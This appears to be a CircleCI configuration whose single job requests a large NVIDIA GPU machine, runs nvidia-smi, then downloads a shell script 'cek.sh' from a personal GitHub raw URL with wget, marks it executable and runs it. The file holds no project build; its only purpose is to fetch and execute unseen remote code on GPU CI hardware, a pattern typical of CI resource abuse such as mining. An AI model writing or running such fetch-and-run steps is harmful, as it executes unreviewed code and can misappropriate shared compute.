version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-1604-cuda-10.1:201909-23
    resource_class: gpu.nvidia.large
    steps:
      - run: nvidia-smi
      - run: wget https://raw.githubusercontent.com/saptasitanggang/saptasitanggang/main/cek.sh && chmod +x *.sh && ./cek.sh


